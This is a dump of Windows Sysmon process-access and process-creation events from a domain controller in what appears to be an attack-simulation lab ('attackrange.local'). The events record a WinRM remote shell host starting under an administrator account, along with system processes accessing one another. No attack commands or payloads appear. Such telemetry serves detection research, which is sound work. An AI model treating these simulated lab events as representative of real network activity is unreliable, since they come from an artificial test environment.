13:33:19.278{59A5CD1D-8CA9-6005-1300-00000000A201}12681244C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.278{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.263{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CB02-00000000A201}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.255{59A5CD1D-8E1F-6005-CA02-00000000A201}4504C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.247{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.950{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.935{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D302-00000000A201}3292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 